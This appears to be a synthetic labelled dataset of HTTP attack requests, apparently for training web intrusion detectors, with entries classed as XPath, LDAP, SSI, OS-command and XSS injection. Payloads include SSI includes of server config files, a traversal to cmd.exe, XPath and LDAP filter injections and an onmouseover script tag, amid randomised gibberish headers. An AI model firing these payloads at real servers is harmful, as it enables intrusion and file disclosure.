Date: Thu, 23 Oct 08 18:57:13 CET
ETag: W/"@tyb3ncQYBWwihXP"
Expect: sz4c0e
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Thu, 30 Aug 07 09:12:25 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: "-QTDv4VOhK9LqqzOgu"
If-Range: *
Max-Forwards: 284
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: -956,35-
Referer: /eUC232lh/oeel/saEuimj.pl
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.4 (compatible; Konqueror/4.8; Open BSD i386; tnwek6olbh; wunfhs97m)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/2.9 www.idlwgT.css, HTTP/1.9 www.iungs.htm
Transfer-Encoding: compress
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38559
Start - Id: 49973
class: XPathInjection
GET /2KJZZN5v/G_EM/Z4/o2RTrYvubV_yuMZVpz2/RQLpZunionunioniAHfaccess_log2/cKd-kT8XeqA3EN9rwkp/ynfhnj0fVemd1et/i3Fh8n5xa7Ggu/enswhmn2d/aCjbLTKR@YfHqnnn.swf?5feHsahu=cuuiuleIr&L3gWlvbacceptg=30&LuuYkac5teO=b4rrdlE&rrga=904890&Xonso=eqesrubpxnnemcm&h8zt=632893695&eiaW8lDlnym=a6shedrn%27+++or+++++6++++%3C+++++count%28path%2Fchild%3A%3A*%29++or+%27iaumo%27++++%3D+++%27&esyirndh=epd1ktsyor HTTP/1.0
Host: www.nTyaat5eti.de
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-3, x-mac-ce;q=0.0, shift_jis;q=0.2, windows-1255
Accept-Encoding: 
Accept-Language: ldgXa-t0;q=0.0, z-55;q=0.1, eTrcovsa-faanvete;q=0.4, n-t
Cache-Control: min-fresh=2
Client-ip: 85.90.171.108
Date: Sun, 06 Dec 09 10:26:43 CET
ETag: "exMH4xBBVXjJD5W"
Expect: ahthray
From: aihryej@wvtazei.be
If-Modified-Since: Sun, 02 May 10 11:53:37 CET
If-Unmodified-Since: Wed, 03 Sep 08 03:02:53 GMT
If-Match: "NCIoqX_liYB_xXW107AD"
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: pshua9=b
Proxy-Authorization: Digest cnonce="drtr"
Authorization: Basic c2huZTp1bWl0OG8z
Referer: /r72iham/yrreoon/aejk.js
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.2 (compatible; MSIE 8.0; Solaris; oEhrqitDca; 8lv4eH)
UA-CPU: 68000
UA-OS: Linux
Via: qoj1u/1.1 www.keEtKph.css, FTP/4.8 www.shlokalo.gif
Transfer-Encoding: gzip
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Serial-Number: 6790519632
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49973
Start - Id: 39568
class: SSI
POST /abv1hnhlAb5/uCJ3y0RFdDDdEdllIBHB/ygdge2u2I.htm? HTTP/1.1
Content-Length: 160
Content-Language: niujohww
Content-Encoding: compress
Content-Location: /oevo/Faena6Dl/vlitRbu.mp3
Content-MD5: ZXBjdzVobjVkdXJjZWhhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 11 Oct 05 21:24:02 GMT
Host: www.uado.de
Connection: rylhia
Accept: audio/*;q=0.1, image/png;q=0.1
Accept-Charset: iso-8859-6, koi8-r;q=0.4, iso-8859-7, x-mac-arabic
Accept-Encoding: gzip;q=0.7, gzip, deflate
Accept-Language: un5cel9-rk6h;q=0.6, elssitse-adet, jtDtrsn-gcu, 5n7-e;q=0.3
Cache-Control: only-if-cached
Client-ip: 222.71.177.248
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Tue, 14 Oct 08 19:39:40 GMT
ETag: W/"vZcMQZwfRNN7OOS96"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: ".pWFlEZtIRHo2b2NVp"
If-None-Match: "euxEby7u13viOEm-J"
If-Range: Fri, 26 Jan 07 08:21:10 UTC
Max-Forwards: 77
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM UjRpaXRwbWYxb2phZG9lbmE5R3dvYmVuOXVvaHY4aXJhenQ=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: http://eSwim.be/ttoodnq/rlTsle/tehven.zip
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: Mozilla/1.6 (X11; U; Unix 8.3; Om-wl; rv:4.4.0) Gecko/43282093
UA-Disp: 9131,8742,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 645x141
Via: HTTP/0.0 120.190.157.251:7441
Transfer-Encoding: compress
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Forwarded-For: 36.239.161.183
X-Serial-Number: 7950474453739700165
----: ------------------
~~~~~: ~~~~~~~~~~

t3=hio&a-cD7BUJftpED=<!--     #include  virtual="/etc/httpd/httpd.conf"     -->&ensrto=bd06re2nola&X_yuf6LN=F2Wnowindow.openrjxu0 eihsoptLfa

End - Id: 39568
Start - Id: 40734
class: SSI
GET /r0WQBdp3D6ZSV/o1qHpO9K.tUEeBKRvs/rdeEeurbh/0kCreiencc3/ereaenfCnan/zo7eoArs3aro.cgi?netn7h9asesA4ea=h%7Ctrnctw&At7hwtk=%7EAmsgo1jnlh7bts&RD70=8i2Hrs+Lfu&Cx@@A=ea+o+Eiuw4&oduo3rp42=orem9slstta&tEvOBzyNLGMe=hamnt%3Dah&atviqjrewMv2TE=%25m- HTTP/1.0
Host: 218.227.154.167
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: <!--   #odbc    statement   =    "select     tmritAot, 3ota8,   atfoec   from cFce  order by  1,     94,   2"     -->
Accept-Language: *;q=0.7
Cache-Control: no-store
Date: Sat, 03 Nov 07 23:08:23 CET
Expect: ed4t2=rauw;osl4r=ciwSp80e
If-None-Match: *
If-Range: Tue, 03 Feb 09 06:06:21 GMT
Max-Forwards: 5590
Referer: http://www.qDthm.com/njsafo6/zsnhs2/bsahne.tar.gz
User-Agent: tsZgiCK http://www.riershty.com
Via: 9.7 www.enehdUph.gif:12309, HTTP/1.9 www.RrdhwbwO.jpg
Transfer-Encoding: compress
Upgrade: t8od/3.1, tcb/0.1, 6eth/6.2
----: ----------------------------------

null

End - Id: 40734
Start - Id: 39084
class: LdapInjection
POST /f0heeesfatsca/ietutdifItpu.sh? HTTP/1.0
Content-Length: 78
Content-Language: rr
Content-Encoding: identity
Content-Location: /dwaiooa.exe
Content-MD5: cmlvbmlPYW1wa2VlME9JTA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Apr 04 19:18:16 GMT
Last-Modified: Sat, 22 May 04 01:44:54 GMT
Host: 51.126.92.212:78
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=574
Client-ip: 227.223.198.3
Cookie: tsi=75;tRbiladuekuofp=eDthtpass98AHple(S8trg)uZ;_FwCPscriptSC=")(targetfilter=(o=NetscapeRoot));oavotlifoiAg=g2ti2xdsfEmfootu;ietqiyadaab=aoe;Xn1izM4bWhome0=h
Cookie2: $Version="549"
Date: Fri, 19 Jan 07 13:42:33 UTC
ETag: "uJ_x_Z2sbrGT@LC"
Expect: 100-continue
If-Unmodified-Since: Sat, 08 Jul 06 11:11:50 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Nov 07 07:17:14 GMT
Max-Forwards: 4074
MIME-Version: 9.6
Pragma: rme=etztms
Authorization: Basic YTR0dTVoOWU6dm50dHNy
Range: 5646-401977,1107-6680,-60
Referer: http://www.e0hlerm.biz/eenr.mpg
TE: chunked;q=0.9
Trailer: Expect
User-Agent: Mozilla/4.4 (X11; U; SunOS sun4u 7.3; aq-io; rv:1.8.1) Gecko/17262962
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 455x2330
Via: HTTP/5.5 www.lcgGc5.jpeg, HTTP/6.3 www.ec0t.tiff
Transfer-Encoding: compress
Upgrade: Rf9tt/9.5, soya/3.6
Warning: 553 253.145.241.182 "ehdterdEEttm" 
----: ------------------------------------------

otwod=2snl9oqaitieeoeT&loeo3arocrcTeo=68407&u5odttE= cepsl &5toOa=/ ttelnet7

End - Id: 39084
Start - Id: 48572
class: XPathInjection
POST /hmecniis2hzih/QM/sr1dm/a6i/aT.x_rZ/ftEerecngrwGh/m1/alrvdTnteznah9snti/nyi6jp.696m.css? HTTP/1.1
Content-Length: 228
Content-Language: njfn5eir
Content-Encoding: compress
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: dXJST3NweGV0ZDNSY290cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 May 04 08:44:23 GMT
Last-Modified: Sun, 11 May 08 21:32:25 CET
Host: 116.228.88.26:80
Connection: ytqeis4s
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: s6-rhr, o7eTiAei-st5zsc, teo-js5aVE;q=0.9, mp6e-n0wr
Cache-Control: only-if-cached
Client-ip: 5.57.77.191
Cookie: LRrvarVdOO=n;gtP=651976;RYdKBe=35;H6e@B.PJ=1lTh6mh
Cookie2: $Version="071"
Date: Sat, 27 Jan 07 04:40:32 CET
ETag: "GSCXoNh2vkhzld6.WL"
Expect: oaln=atraiu;nomtiAaz=iaeh
From: rioL@tassgulsar.uk
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Thu, 16 Oct 08 15:00:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Jan 05 04:29:18 GMT
Max-Forwards: 260
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic NGFpOXJ1OGw6cnR0aHRncg==
Authorization: Digest qop=auth-int
Range: 9027-,6479-,26031-
Referer: /tlahdwt/rretVSe/oiuv5/eTirc.jpg
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/5.8 (X11; U; Unix 3.5; Nh-rn; rv:6.5.7) Gecko/51067557
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: vzro
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

scriptsGpfVIgI6=LTsgugoa7ctosnrr&sDHj=to&bidRrEdto=ga8s&evalvL-.bKAAucU=521523&cr5aqesm=7intEimfe&oooroq9wn=dleBea&iaeemwn=reh/Eonig/mtnct9/child::node()[position()=485]     or     'bstogc'   =  '

End - Id: 48572
Start - Id: 40654
class: SSI
GET /2@f5/0fXa99I3Zd0Zvps/tg0LkLOStb/EcobddaiOnqav68cdftf.htm?Sto6vgnepf2hsi=uzrteoamer1&simlrlIin=dnmT&tteLccrdhyhQl=73&HD0ah=7136&lnssddjcrng=xdEesanumacaauk&uUy7hihe3kj=2lt&elOwme=ti4dxhahbU&YLuBRz=qH8J&LGmviframe=tustcbHetod2n&iwEnw0nsbhdvn=%3C%21--+++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&mO4z-id3L=hEF3&3rdsik=sknpp&tnGgeErBenSSsl=46&ltaSoauiec6=ugbofhehttp-valibze HTTP/1.0
Host: 205.55.246.170
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.5
Accept-Encoding: identity, compress;q=0.5, deflate;q=0.3, deflate, deflate;q=0.0
Accept-Language: hat-hktyHes
Cache-Control: no-transform
Client-ip: 248.207.90.129
Cookie: ewe=lsm]w$ilAu r
Cookie2: $Version="96"
Date: Fri, 16 Nov 07 03:39:21 UTC
ETag: W/"dfTtUZa8E73q0ia0J"
Expect: 100-continue
From: Doem@euee.uk
If-Modified-Since: Sun, 25 Oct 09 05:52:44 UTC
If-Unmodified-Since: Tue, 20 Apr 04 08:12:31 GMT
If-Match: "OtIahhw_1X4Y.m.yasGa"
If-None-Match: "tCH68Sc4-aUe7QgHStpb"
If-Range: Mon, 07 Apr 08 22:45:18 GMT
Max-Forwards: 4
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=o7p4dt7s
Authorization: Basic dGxyaWloaTo4ZWVo
Range: 304-328185
Referer: http://www.8mwd58.org/ocpT2.swf
TE: deflate;q=0.1,deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 7.5; 7t-qS; rv:5.3.6) Gecko/87928703
UA-CPU: StrongARM
UA-Disp: 1159,7674,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: EesIy/1.4 31.180.163.7
Transfer-Encoding: gzip
Upgrade: ono/2.9, rvsstr/4.3, n2s/4.0, roa/8.5
Warning: 381 www.ehdcewa.js "Od6ygEdahSe9" 
X-Forwarded-For: 12.148.180.245
X-Serial-Number: 552421
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40654
Start - Id: 43737
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 149.168.31.229
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Tue, 19 May 09 18:57:31 UTC
ETag: W/"G4AsBzyc4BCrx9quAQV"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Sun, 05 Jul 09 05:42:37 CET
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: "5Ca07Mlw.icw.VCsV"
If-None-Match: "QP8pNWSyUctvnX7Q6"
If-Range: *
Max-Forwards: 12
MIME-Version: 0.1
Pragma: t='t'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: -1,-82
Referer: /syopAle.asmx
TE: chunked;q=0.7,deflate;q=0.8,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.7 (Windows; U; Windows NT 6.2; ro-em; rv:0.5.4) Gecko/84742843
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: 5.7 42.114.199.231, Erns/0.5 www.dfee4d.htm, 2.8 www.yo3t.tiff
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 94311514979203
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43737
Start - Id: 35908
class: XPathInjection
PUT /aqMDQASaY7-B/SoabRsa2tcrtnenii/sepaIej7idetiehndr.php3? HTTP/1.0
Content-Length: 229
Content-Language: S3
Content-Encoding: gzip
Content-Location: http://otenaseh.fr/5ghaD/hneke/areasas0.pl
Content-MD5: RHVpaWtvdGZmb1VudDFkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Jan 06 10:43:33 UTC
Last-Modified: Sun, 05 Jul 09 11:38:23 GMT
Host: www.kborelAdOs.be
Connection: rieetao
Accept: */*;q=0.0
Accept-Charset: euc-jp, euc-tw;q=0.1, cp-936;q=0.2, x-mac-roman
Accept-Encoding: *;q=0.5
Accept-Language: o-i3nhn, as-ys9xoe2;q=0.6, ou6ete-7Aueno;q=0.5, nie-Sgjt0me
Cache-Control: min-fresh=4568
Client-ip: 108.233.62.122
Cookie: atpe=2teoo$It;rdxeo=sBjvLkx;t5etozeoett=cDwNdOr1'    or   gulo/dklihI/child::node()[processing-instruction()=286] or  'us'    = ';hikysosEgcesb=tGSJutR@RB8
Cookie2: $Version="59"
Date: Mon, 13 Feb 06 03:09:10 CET
ETag: W/"Su_QmmZeHI2ivaCU"
Expect: slCstn=amevoy;neyz=5Sh0
From: tarau@ei6ci.com
If-Modified-Since: Fri, 22 Jun 07 19:43:46 CET
If-Unmodified-Since: Fri, 16 Jan 09 21:42:39 UTC
If-Match: *
If-None-Match: "6EmQYu82o6iE@BA"
Max-Forwards: 998
MIME-Version: 8.5
Pragma: no-cache
Authorization: NTLM b1hyaGVmVGFtZWJod25laDVUZ3BxZHRub0VqZWVxb1dIc25p
Range: 9-
Referer: /b0wph/0dmtw/a1csi/obnDl.jpeg
TE: trailers,trailers,trailers
User-Agent: hyO1mersE1/8.3.6.3.5
UA-Color: color8
Via: 4.6 www.rinttt.jpg, Ito/9.4 www.Estt.html
Transfer-Encoding: identity
Upgrade: uinz/0.1, ccQ/0.0, nNa/8.7, tss/5.6
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

all8nqHVafmAVR=i&dphhtaccesG=htaccesedrop&ahtzenxmle/8ot0&mydpOez=s8LXw&etit2=oh we<lann&e2o8ir3gn=n&dN&Edycp=scriptn:chq6hi&oGtw&9tE.=iI~&Wtg-2Tk7qhZc=H@d eho&itsev3=hoo8lth&ht=eDei 7hshutdown1[shc&pyvf=6534672

End - Id: 35908
Start - Id: 48725
class: XPathInjection
GET /3lsetcm7/aoSnt/77/rv6rQSAWO2Tp2/jdnNgbctacrv9w/Pno8te8dtrepgiatAst.aspx?re2rfN9orbdi=gas-%242A&beDsf=riIEoBM3j&rv=processing-instructiononph-htpass2tmohagfi%3Dbtt%5Br&tpw0=%26p&latrzR=%28i+++%3C+++count%28XXnuSr%2Fchild%3A%3Atext%28%29%29+++and++++j++%3C+++++count%28sdn%2Fchild%3A%3Acomment%28%29%29+and+++k+++%3C+++++count%28usli%2Fchild%3A%3A*%29++%29&ekswtoTsall=ni%26binunhaU&eHrIlsri=osevg&iettd3pos=t7faSVTPm&dasenejzunro=iyRSV0O3 HTTP/1.0
Host: www.eEAm.com
Connection: close
Accept: video/quicktime, image/*;q=0.4, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-age=4074
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="515"
Date: Mon, 22 Mar 04 18:14:47 GMT
ETag: W/"V8UTY.e7_JhVggpJl"
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "a9mLm.2tOZSRbRGG6L5m"
If-None-Match: "zfo7oCFukF4XNIM4y"
If-Range: *
Max-Forwards: 5095
Pragma: no-cache
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: Basic dGVFZTppa3U5aA==
Range: 7-577073
Referer: http://www.yijtd8.st/rZft/2amriil/sneaer7s.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.6 (compatible; Konqueror/1.0; Open BSD i586; 6BD1uti)
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: 5.3 www.soee6.css, 6.0 www.ias37.htm:27556, 8.9 216.130.176.160
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48725
Start - Id: 38877
class: LdapInjection
GET /9t0MCifJMBv7.pl?3aoBi=822&iTttrtuSeo5hd=dA&noehsui8oszh9ao=727872&1hnetcatCchOggxO=taSthprlmed2gEqoo&3iusmLhlstMr=tPtre&ARkUperliwp-unuPY=48215&9ntrtolreioe=7013&kwcsIttiio=%29+%28+++%7C++%28++++cn%3D*o%27brien*++++%29%28mail++++%3D*o+%27brien*+++%29++++ HTTP/1.0
Host: 85.98.45.223
Connection: acdoul
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew, iso-8859-6, iso-8859-8-i;q=0.8, windows-1255
Accept-Encoding: identity, deflate, deflate;q=0.4
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 206.129.188.199
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="380"
Date: Tue, 04 Jan 05 18:01:52 GMT
ETag: W/"kIaHUCP6c03l.Tt71Mx"
Expect: iyewnrs
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: *
If-Range: Thu, 13 Sep 07 13:54:42 UTC
Max-Forwards: 3764
MIME-Version: 1.2
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Basic RXlsb25vZWU6aHJsc3hh
Range: 15934-,799-8058,-81465
Referer: /abbrvp/lm5terX.conf
TE: chunked,gzip,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.7 (compatible; Konqueror/9.1; Mac OS X; ewnbtymn; thhnrid2ei; durbara0a)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 7.7 www.smftmxv.tiff, FTP/3.3 223.161.207.227
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 9521103915785136495
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38877
Start - Id: 48416
class: XPathInjection
GET /jnuI6-/7QCbVcM-AL77D799/ejnDw.asp?mmtyiuiwfsnie=s3wBF&octi=0aK&Tdt=l4avmendldm1&XohlocationsystemI=y6d7t HTTP/1.0
Host: www.drhtUey.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.166.184.126
Cookie: 83nvmf3u=rs/t/e/child::node()[position()=5]  or     '7tgt'   = '
Cookie2: $Version="8"
Date: Thu, 16 Aug 07 11:26:44 UTC
ETag: W/"iAuTrX58wVWk91DgMt"
Expect: 100-continue
From: raintj@2nDi.com
If-Modified-Since: Tue, 10 Aug 04 04:20:52 UTC
If-Unmodified-Since: Sun, 17 Jul 05 01:43:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: oRFW=pwt
Proxy-Authorization: Digest opaque="uacst"
Authorization: NTLM c2FzcXN0ZDhlcWhzMmpvbm5laWlhb2lhanV0YW5pbGljYnJlNG9tZTdhRXR0
Range: 78647-,9158-,4840-
Referer: http://mr5i.cz/rfue.wmn
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 1.1; iY-H6; rv:9.3.0) Gecko/99732102
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 979x9457
Via: 8.2 www.7irteip.gif
Transfer-Encoding: identity
Upgrade: Ode/7.1
Warning: 160 191.100.5.46 "y2fbaaTltys" "Thu, 31 May 07 10:23:19 CET"
X-Forwarded-For: 200.45.80.130
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48416
Start - Id: 47447
class: XSS
GET /hIiStuI9ali/tI6W9inIhoerei6miLoo/BT-Ypositionmail-nYzsWHF/sXvJQcboot.iniBsA/bl1RuIZg.gif?eadite=hu%7Eth&euAemcptk=%3Cimg+++++src++++%3D%22++nesive%22onmouseover++++%3D++++%22+%5Balert++++%28%278d%27%29%3B%5D%22++%3E HTTP/1.0
Host: 102.47.179.242
Connection: close
Accept: text/*;q=0.7, audio/*;q=0.1, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 125.166.89.173
Cookie: _XyA-aTP@servicesP=Rscriptal
Cookie2: $Version="79"
Date: Tue, 09 Dec 08 04:37:36 GMT
ETag: "xMu08ozzBwiL@pSdUkT"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 30 Jan 08 18:02:43 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Apr 09 07:36:48 UTC
Max-Forwards: 885
MIME-Version: 8.8
Pragma: h=pu7
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="eiunos"
Range: 0593-564245,-71179
Referer: /lseeb/bp5pp.txt
TE: deflate,trailers,trailers
Trailer: If-Range
User-Agent: vy2knyac5/5.0
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/1.5 www.iteSsjfh.js
Transfer-Encoding: Ullno; roei5ks1=fs2t7t2
Upgrade: tah/4.0, bipq/1.5, o5rz/9.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47447
Start - Id: 49188
class: XPathInjection
GET /oA3O.tiff?3lm8txeow0a7vo=msYbgbtx4sh9ia&0Z269w@Pvar2A=8762+or+1%3C+Ioroo%2Foos3ie%2Fbi1%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D16%5D+++++or+190%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&cu6lfepfCgs=oth&1reciear=ioh&P5h9=6102&ssiinhanlno=erv%2667Dt%28pcrmif1ifhome&cnq9ee=951866382&Bseta=oformaa&b2s8ceaEut=5copyifromgl9e&Gs@wjScx0a=eaoRoelAsmhh HTTP/1.1
Host: 41.97.71.206
Connection: eriw
Accept: image/png;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 69.65.142.204
Cookie: ri=tmahucdphgad1d;Ch4=3;mzzro=hwun\ewidv;luede=sG2sbs;3s7msna0e=div9
Cookie2: $Version="8"
Date: Sun, 03 Jun 07 08:56:37 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 4160
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest uri=/amizr/ils8g/nze9.png
Range: 87-,-69535,7135-70843
Referer: http://www.ndeda.st/T4gb8d/eiaOp/Ri8cieta/ffsh.swf
TE: trailers,gzip,gzip;q=0.6
Trailer: Accept
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 2.5; jn-oi; rv:2.6.2) Gecko/49940719
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: 2.2 44.143.124.119
Transfer-Encoding: identity
Upgrade: 1iqlLr/6.5, tlii/7.8, eetsh6/1.2, xr2f/8.0, jok/4.0
Warning: 186 110.57.33.198 "wcete" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49188
Start - Id: 40684
class: SSI
